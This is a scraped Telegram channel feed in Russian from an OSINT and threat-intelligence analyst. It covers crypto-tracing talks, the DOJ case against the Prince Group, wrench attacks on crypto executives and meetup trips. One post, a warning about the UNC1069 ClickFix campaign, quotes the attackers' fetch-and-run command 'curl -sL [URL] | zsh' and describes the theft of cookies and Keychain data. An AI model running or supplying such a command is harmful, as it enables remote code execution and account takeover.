сelestial intelligence lab
1.06K subscribers
87 photos
4 videos
3 files
52 links
building cool things with cool people🕵️‍♂️
@celestial3301
Download Telegram
Forwarded from Чёрный Лёд
Вторым докладчиком на встрече выступит CelestialOSINT analyst и CTI analyst.

Доклад:
Кроссчейн-мосты между приватностью и атрибуцией: системный анализ криминального использования”.

Коротко о содержании:
• как работают кроссчейн-мосты и где они выдают следы;
• популярные маршруты типа Tron → BTTC → Polygon → CEX;
• типовые ошибки атакующих и реальные кейсы 2025 года.

📅 Когда: 29.01.2026
🕖
Время: 19:00
📍
Где: г. Алматы, Energo University
🔥5🍾32❤‍🔥1💋1
Увидимся через 2 дня)
7🍌1
Всем спасибо за то, что пришли. Было круто
Надеюсь, что доклад побудил вас вникнуть в тему криптовалютных расследований)
👏9🔥74🌭1
Набираю 6 студентов на OSINT-практику

Летом хочу собрать небольшую команду студентов, которые хотят нормально попробовать себя в аналитике и OSINT

Будем заниматься:
— сбором и анализом данных
— исследованием платформ
— построением графов связей
— подготовкой аналитических материалов
— участием в разработке OSINT-инструмента

Если вам это интересно, напишите в личные:
ФИО, вуз/курс и пару слов о себе (что уже пробовали делать или чему хотите научиться).

Возьму небольшую группу - до 6 человек, чтобы можно было нормально поработать с каждым
🔥8❤‍🔥41🤔1
🚨 Apple закрыли 0-day. Уже использовался в атаках.

CVE-2026-20700

Если у вас Mac / iPhone / iPad - нужно просто зайти и обновиться.

Пофикшено в:
• macOS Tahoe 26.3
• iOS 26.3
• iPadOS 26.3
• visionOS 26.3
• watchOS 26.3
• tvOS 26.3

Просой OPSEC:

1) Проверить свою версию
2) Установить обновление
3) Напомнить близким сделать то же самое)

Решил тут немного еще про Apple постить, так как в свое время мечтал у них работать)
9👀3❤‍🔥2
UNC1069: Deepfake-театр и терминальные эксплойты

Группировка перешла от стандартного фишинга к использованию AI-аватаров реальных CEO прямо на созвонах. Вы заходите на встречу (домен типа zoom-meeting[.]us), видите известного фаундера, слышите его голос, но видео «лагает» из-за якобы плохого соединения.

Вся схема заточена под вектор ClickFix.

Вместо того чтобы кидать подозрительный файл, вас просят «починить», вставив скрипт в терминал. Расчет на психологию: скопировать код кажется безопаснее, чем скачать exe-шник.

Исполнение моментальное. На macOS это классический curl -sL [URL] | zsh, на Windows прилетает mshta.

После ввода команды они не ищут сид-фразы. Они пылесосят активные сессии (Cookies). Это дает прямой вход на биржи (CEX), в админки и SaaS в обход 2FA. Заодно вытягивают Keychain и сессии Telegram (tdata), чтобы масштабировать атаку уже от вашего имени.

Кампания эксплуатирует старый миф о том, что macOS безопасна «из коробки». Если кто-то просит вставить команду в терминал, чтобы пофиксить микрофон - рубите связь. Даже если на экране ваш друг.


Более подробно об этой APT можно прочитать здесь:

https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering
5🤯2
Речь про тот самый кейс, где DOJ изъяли 127 тысяч BTC, связанные с pig butchering схемами. Огромные суммы, десятки тысяч транзакций и целая сеть компаний вокруг. Но самое интересное не в цифрах, а в том, как это всё было устроено.

DOJ по сути разобрали не просто набор кошельков, а теневую финансовую систему. Когда смотришь на структуру Prince Group, это больше похоже на банковскую инфраструктуру, чем на скам-кошелёк. Mining-операции работали как отмывка ликвидности, Huione OTC были рельсами для движения средств, а Prince Bank выступал как точка выхода в фиат.

Pig butchering давно уже не «скам из телеги». Это индустрия. С траффикингом людей, колл-центрами, CRM, KPI и нормальной финансовой логистикой через ончейн. Деньги дробятся, гоняются по адресам, проходят через прокладки.

Я сел писать об этом после статьи Elliptic “Park: Prince and Huione’s role in a scam compound still operating amid crackdowns”. Она хорошо показывает, как такие структуры продолжают работать даже на фоне давления и арестов.

И на фоне этих миллиардов особенно тяжело смотреть недавнее интервью в Казахстане. Парень просто искал хорошо оплачиваемую работу и в итоге оказался в трудовом рабстве в Мьянме в составе scam compound. За всеми этими графами и миллиардами всегда стоят реальные люди.
5🔥2
Если всё это собрать в граф - получается вот такая картина.
И это ещё без мелких связей.

Кошельки уже кластеризированы - то есть объединены там, где есть признаки общего контроля.

И если честно, то масштаб э поражает.
Поэтому я впечатлён объёмом проделанной работы DOJ.

Я помню свой первый ончейн-трейсинг: тогда каждая транзакция казалась лабиринтом. Понять логику движения средств, увидеть связи, не утонуть в деталях - это было крайне сложно.

А когда смотришь на такие расследования, кажется, будто это всего лишь линии и точки на графе)
8
Prince group.pdf
2.8 MB
А вот и сам репорт от DOJ
5
Ладно, если не говорить о прошлом, а о нынешних трендах, то во Франции сейчас происходит что-то очень неприятное.

CEO Binance France Давид Пренсэ стал целью вчерашнего нападения. Около семи утра трое в масках ворвались в жилой дом, сначала ошиблись квартирой - искали именно его. Когда добрались до нужной двери, его и семьи дома не оказалось. Забрали два телефона и скрылись. Он и близкие не пострадали. Но сам факт показательный.

И это не единичный случай.

В январе 2025-го похитили Давида Баллана, сооснователя Ledger. Из собственного дома во Франции. Требовали €10 млн в крипте. Чтобы ускорить выплату, ему отрезали палец. История закончилась спасением после частичного перевода выкупа, но сам сигнал был максимально жёсткий.

Во Франции сейчас реально пиздец творится вокруг крипто-индустрии.
Это wrench attack в чистом виде когда вместо эксплойта используют физическое насилие.

Мы много говорим про OPSEC, про cold storage, про multisig, про разделение ролей, про air-gapped устройства. Но вся эта архитектура ломается, когда к тебе приходят домой. И это новая реальность для публичных фигур в крипте
6😈2
Это те преступления, при которых во Франции похищали криптовалюту с применением физического насилия за 2025-2026
6🤯2🍌1
надо будет в этом году податься)
🔥7
Forwarded from ZeroNights
🟩Следующий ZeroNights — 30 сентября!🟩

В 2026 году встретимся на конференции по практической безопасности в Санкт-Петербурге в пространстве LOFT #7.

Надеемся на теплую осень и готовим насыщенную программу: ванильный раф на альтернативном молоке и думать о баг-баунти доклады и воркшопы, таски и CTF, нетворкинг и спикер-пати 🩷

В скором времени мы запустим CFP, а пока предлагаем вам рассмотреть возможность стать коммерческими партнерами конференции. Отправить заявку можно через форму на главной странице сайта.
Или напишите нам на почту: partner@zeronights.ru

➡️ Встретимся на ZeroNights 2026!
Please open Telegram to view this post
VIEW IN TELEGRAM
6
Forwarded from OSINT mindset
გამარჯობა საქართველო! Приближается OSINT mindset meetup geo #1 и мы готовы представить наших спикеров!

Soxoj — Введение в OSINT

Константин Яковлев — Фактчекинг на полную катушку: опыт (очень) большой редакции

CuriV — Техническая разведка глазами пентестера

Ждём всех 28 февраля, в 14:00 (UTC+4), по адресу г. Тбилиси, ул. Мераба Алексидзе, 1, в Sandbox Hackerspace. Мероприятие полностью бесплатное, без регистрации и возрастного ограничения

🌐Site | 💬 Forum | 🔍 Family |YT
Please open Telegram to view this post
VIEW IN TELEGRAM
Всем привет!

Едем в Тбилиси на митап - OSINT Mindset будет в крутом составе 🔥
Если вы рядом или давно хотели познакомиться - это отличный повод

До встречи в Грузии 🇬🇪
11🌚2
✈️ Аэропорт. Везу конину. Национальная миссия.

Стою такой с пакетом, думаю - щас уточню у женщин (грузинок), можно ли конину привезти.

Подхожу.

— Девушки, подскажите, конину можно провозить?

Они на меня смотрят секунд 5.

И такие:

— Бро… мы веганы. Ты вообще не туда 😭

Из всех людей, извсего терминала
Попал ровно в веганское комьюнити

Мораль:
OSINT иногда не работает в реальной жизни.
Надо было сначала собрать данные о таргете
🤣15🔥2🤝1
Forwarded from Soxoj
На полке обнаружен Димаш
🤣8😱5🔥2😴1
Какая же была крутая поездка в Грузию 🇬🇪
Столько разговоров, идей и просто приятных людей вокруг.

Отдельное спасибо @osint_mindset. Без преувеличения, но в какой-то момент именно через вас я вообще глубже зашел в OSINT. И это реально поменяло мой путь.

Иногда понимаешь, что жизнь становится намного интереснее, когда вокруг люди, которые тоже постоянно что-то изучают, копают и развиваются.

Такие поездки напоминают, что надо просто продолжать развиваться и делать то, что тебе интересно.

Кстати, тут познакомился с @CuriV - очень заряженный пентестер.
Конечно же позвали его на KazHackStan.
Надеюсь, скоро снова увидимся
16👍2🔥2